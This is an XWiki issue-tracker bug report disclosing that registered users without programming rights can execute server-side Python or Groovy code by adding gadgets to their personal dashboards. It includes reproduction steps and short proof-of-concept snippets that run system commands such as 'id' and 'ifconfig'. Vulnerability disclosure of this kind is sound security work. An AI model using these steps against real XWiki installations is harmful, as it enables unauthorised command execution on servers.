XWiki Platform / XWIKI-16960

Authenticated server side code execution without programming rights

    Details

    • Type: Bug
    • Status: Closed
    • Priority: Critical
    • Resolution: Duplicate
    • Affects Version/s: 7.2, 8.4.4, 11.10.2
    • Fix Version/s: None
    • Component/s: Dashboard
    • Development Priority: High
    • Difficulty: Unknown

Description

Registered users without scripting/programming permissions are able to execute python/groovy scripts while editing personal dashboards.

Full path to reproduce:

1) Create a new user on xwiki.org (or myxwiki.org)
2) Go to profile -> Edit -> My dashboard -> Add gadget
3) Choose either python or groovy.
4) Paste the following python/groovy code (for unix powered xwiki)

Python:

import os
print(os.popen("id").read())
print(os.popen("hostname").read())
print(os.popen("ifconfig").read())

Groovy:

r = Runtime.getRuntime()
proc = r.exec('id');
BufferedReader stdInput1 = new BufferedReader(new InputStreamReader(proc.getInputStream()));
String s1 = null;
while ((s1 = stdInput1.readLine()) != null) { print s1; }

5) Submit the gadget

Expected behaviour:

- User is unable to execute server side code due to lack of permissions

Current behaviour:

- User can execute server side code, as seen on the screenshots.

This issue affects all versions of xwiki that have the personal dashboard feature.

Attachments

1. myxwiki_org_rce.jpg (326 kB, Gorban Aleksei)
2. xwiki_org_rce.jpg (78 kB, Gorban Aleksei)


People

• Assignee: Simon Urli (surli)
• Reporter: Gorban Aleksei (gorbanalex)
• Votes: 0
• Watchers: 3
